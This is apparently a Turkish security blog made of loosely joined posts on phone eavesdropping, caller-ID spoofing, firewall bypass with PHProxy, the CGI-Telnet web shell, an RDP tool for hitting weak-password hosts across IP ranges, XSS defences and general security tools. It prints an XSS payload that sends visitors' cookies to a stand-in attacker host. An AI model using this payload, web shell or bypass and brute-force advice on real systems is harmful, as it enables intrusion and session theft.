Turkcell’den alıntıdır;

…
Şebeke üzerinden dinleme
GSM şebekelerinde cep telefonu ve baz istasyonu arasındaki hava iletişimi A5/1 adı verilen şifreleme algoritması ile şifreli olarak gerçekleşir. Ses iletişimi baz istasyonunda, data iletişimi (GPRS, EDGE) Core Şebekede (SGSN) deşifre edilir. Baz istasyonu üzerinden dinleme gerçekleştirilemez.(?) ( http://cryptome.org/a51-crack.htm )

Casus cep telefonları
Normal bir telefona kötü amaçlı yazılım kurarak iletişim bilgilerini almak mümkün olduğu gibi bu amaca uygun hale getirilmiş telefonları alarak da bu işlem yapılabilir. Yine telefonun üzerine kurulan casus yazılımlar ile sadece bu işlemler için özel olarak satılan cep telefonları mevcuttur. Bu telefonlar genellikle resmi satış noktaları dışında ‘merdiven altı’ndaki bölgelerde veya Internet kanalı ile satılmaktadır.

Bu telefonların çalışma şekli mevcutta var olan telefon komutlarının yüklenen yazılım ile değiştirilmesi sonucu oluşmaktadır. Telefona gönderilen komutlar veya tanımlanan özel numaradan gelen aramalarda casus işlevi görmesi sağlanmaktadır. Örneğin casus telefon onu kumanda eden telefon tarafından aradığında pasif dinleme özelliği hemen aktif olup ortamdaki tüm sesler dinlenebilmektedir. Benzer şekilde arama yapıp #* tuşlarına basıldığında ise mevcutta yapılan konuşmaya paralel olarak girilebilmektedir.

…

Turkcell Orjinal metin: http://www.turkcell.com.tr/yardim/duyurular/telefondinlemeveceptelefonuguvenligihakkinda

Attacking phone privacy https://media.blackhat.com/bh-ad-10/Nohl/BlackHat-AD-2010-Nohl-Attacking-Phone-Privacy-wp.pdf

• Bilinmesi gereken önemli bir detay da istenilen telefon numarasından istenilen kişinin aranabilmesi konusudur. Bu yüzden arayan numara kime ait gözükürse gözüksün, arama kesinlikle güvensizdir.  Arama yaptığınız kişiye, istediğiniz telefon numarasından aranıyormuş gibi gösterebilirsiniz.
  
• Clone simcard’lar aynıda anda orjinali ile beraber oturum açamaz,

Anahtar kelimeler: imsi catcher, Software defined radio hardware, a5/1 crack,  rainbow table, The Universal Software Radio Peripheral (USRP)

22/11/2010- İzmir

Kurulumunu gerçekleştirdiğiniz host üzerinden surf yapmanızı sağlar.

Sıkı denetimin yapıldığı iç ağdaki kontroller (firewall, transparent proxy control), SSL destekli bir host üzerine  PHProxy kurulumu yapılarak, Encrypted trafik ile bypass edilebilir.

http://phpr0xi.sourceforge.net/

Demo: http://phproxy.goyap.net/

CGI-Telnet web servisi üzerinden komut çalıştırmanıza olanak sağlayan cgi script ‘idir. Çalıştığı işletim sistemine bağlı olarak sunduğu görsel arayüz, kullanımı kolay ve  oldukça başarılıdır. Dosya indirme dosya yükleme işlemleri yapabilirsiniz.  Anlık olarak yazdığınız komutlara dönen cevapları görebilirsiniz.

R57,C99 PHP shell scriptlerine, CGI üzerinden çalıştırılabilen işe yarar alternatiftir.

http://www.rohitab.com/cgi-telnet

Remote desktop protocol microsoft tarafından geliştirilen bir protokoldür. Protokolün farklı sürümleri bulunmaktadır. Windows linux mac gibi farklı ortamlarda kullanılan istemcilerle RDP sunucularına erişilebilir. Microsoft terminal server client (mstsc – uzaktan erişim) hizmeti çalışan PC’ler üzerinde araç etkilidir. Araç kullanılarak, kolay şifreler verilen ve uzaktan erişime açık bilgisayarlar hedef seçilebilir. Sayısal açıdan düşünecek olursak geniş IP aralıkları taranarak etkili sonuçlar alınabilir.

Download: http://ded4sell.ru/?p=1047〈=en

Web uygulamalarında kullanıcıdan gelen ve filtrelenmeden yazdırılan girdiler sömürüye açıktır. Geliştiriciye özel veya ziyaretçilerin görebileceği sayfalara bindirilen javascript kodları sayesinde ziyaretçilere ait document.cookie arkasında saklanan sessionid bilgileri ele geçirilebilir.

<script>document.location = ‘http://evil.example.org/steal_cookies.php?cookies=’ + document.cookie;</script>

Örnek ataklar;

http://ha.ckers.org/xss.html

Örnek güvenli kullanımlar

<?php print ‘<input type=”text” id=”var1” name=”var1” value=”’.htmlspecialchars($datarow[“col_name”]).’”> ’; ?>

<?php print ‘<textarea name=”var2”>’.htmlspecialchars($datarow[“col_name”]).’”</textarea> ’; ?>

http://tr.wikipedia.org/wiki/Cross_site_scripting

http://phpsec.org/projects/guide/2.html

Aşağıdaki açıklamalar phpsec.org’dan alınmıştır.

What can you do? XSS is actually very easy to defend against. Where things get difficult is when you want to allow some HTML or client-side scripts to be provided by external sources (such as other users) and ultimately displayed, but even these situations aren’t terribly difficult to handle. The following best practices can mitigate the risk of XSS:

• Filter all external data.
• As mentioned earlier, data filtering is the most important practice you can adopt. By validating all external data as it enters and exits your application, you will mitigate a majority of XSS concerns.
• Use existing functions
• Let PHP help with your filtering logic. Functions like htmlspecialchars (), htmlentities(), strip_tags(), and utf8_decode() can be useful. Try to avoid reproducing something that a PHP function already does. Not only is the PHP function much faster, but it is also more tested and less likely to contain errors that yield vulnerabilities.
• Use a whitelist approach.
• Assume data is invalid until it can be proven valid. This involves verifying the length and also ensuring that only valid characters are allowed. For example, if the user is supplying a last name, you might begin by only allowing alphabetic characters and spaces. Err on the side of caution. While the names O’Reilly and Berners-Lee will be considered invalid, this is easily fixed by adding two more characters to the whitelist. It is better to deny valid data than to accept malicious data.
• Use a strict naming convention.
• As mentioned earlier, a naming convention can help developers easily distinguish between filtered and unfiltered data. It is important to make things as easy and clear for developers as possible. A lack of clarity yields confusion, and this breeds vulnerabilities.

http://www.webutils.pl

Code tools, encoders/decoders, HASH Calculators, CHECKSUM Calculators

• MD5, MD4, MD2
• SHA1, SHA-256, SHA-384, SHA-512
• RIPEMD-128, RIPEMD-160, RIPEMD-256, RIPEMD-320
• HAVAL-128, HAVAL-160, HAVAL-192, HAVAL-224, HAVAL-256
• TIGER-128, TIGER-160, TIGER-192
• CRYPT

http://hakin9.org/magazine/1296-securing-the-cloud

• Backtrack 4
• NMAP : Enumeration
• Nessus : Scanning & Enumeration
• Ethereal
• Snort  : Network Hacking
• Netcat
• TCPDump : For sniffing TCP Packets
• WinDump
• Hping2
• DSniff : Sniffing Data Packets
• GFI LANguard : LAN Security
• Ettercap
• Whisker/Libwhisker
• John the Ripper : Password Cracking Utility
• OpenSSH
• Sam Spade
• ISS Internet Scanner : Web Server Security
• Tripwire
• Nikto
• Kismet
• SuperScan : Another Great Scanner
• Cain & Abel
• SolarWinds Toolsets
• NTop
• Nemesis
• Honeyd
• Achilles
• Firewalk
• AVG Free Antivirus
• Trend Micro online scan
• Tiny Firewall
• Symantec Virus Tools
• Linux Security Audit Tool
• Firewall Builder
• IPCop
• AirSnort : Wireless Network Hacking
• SATAN
• Rootkit Hunter : To find out installed root kits.
• SpamAssassin
• grsecurity
• IP-Scanner : To scan IP Ranges

http://www.shmoocon.org/presentations.html

Yazılımların hayatımızdaki yeri ve öneminin gün geçtikçe artması yazılımlara ilişkin çalışmaları hızlandırmakta, bu durum yeni yazılım geliştirme yöntemleri, programlama kuralları veya programlama dilleri ve araçları ortaya çıkarmaktadır. Tüm bu gelişmelere rağmen yazılım projelerinde tasarlanan zamanın gerisinde kalma, bütçeyi aşma, düşük kalite, sürekliliği ve güvenilirliği sağlayamama, kullanıcı taleplerinin karşılanmasında yetersizlik gibi problemlerle sıkça karşılaşılmaktadır. Gartner araştırmasına göre bilişim güvenliği ihlallerinin yazılım güvenliği problemlerinden kaynaklananlarının oranı %80’dir [1]. Genel olarak problemlerin çoğu, yazılım geliştirme sürecinin en başında gereksinim ve sistem analizlerinin doğru ve yeterli yapılmamasından kaynaklanmaktadır. Analiz konusunda yetersiz kalan yazılımlar güvenlik riski oluşturmakta, bu durum bilgiye yönelik tehditlerin ortaya çıkmasında önemli bir açıklık oluşturmaktadır.

Bilginin gizliliği, bütünlüğü ve erişilebilirliğini, kısaca bilgi güvenliğini hedefleyen tehditlerle mücadele için yazılımlarda bilgi güvenliğinin sağlanmış olması gerekmektedir. Bilgi güvenliği; karşılaşılabilecek tehditlerin farkında olunması, işlerin devamlılığını sağlama, yaşanabilecek her türlü problemlerde kayıpları en aza indirme, firmaların varlıklarının her koşulda gizliliği, erişebilirliği ve bütünlüğünü korunma amaçları taşımaktadır. Bu kapsamda ortaya çıkartılan ve sürekli geliştirilmekte olan bir süreç de “Bilgi Güvenliği Yönetim Sistemi (BGYS)” dir.

Referans: http://www.bilgiguvenligi.gov.tr/yazilim-guvenligi/yazilim-gelistirme-surecleri-ve-iso-27001-bilgi-guvenligi-yonetim-sistemi.html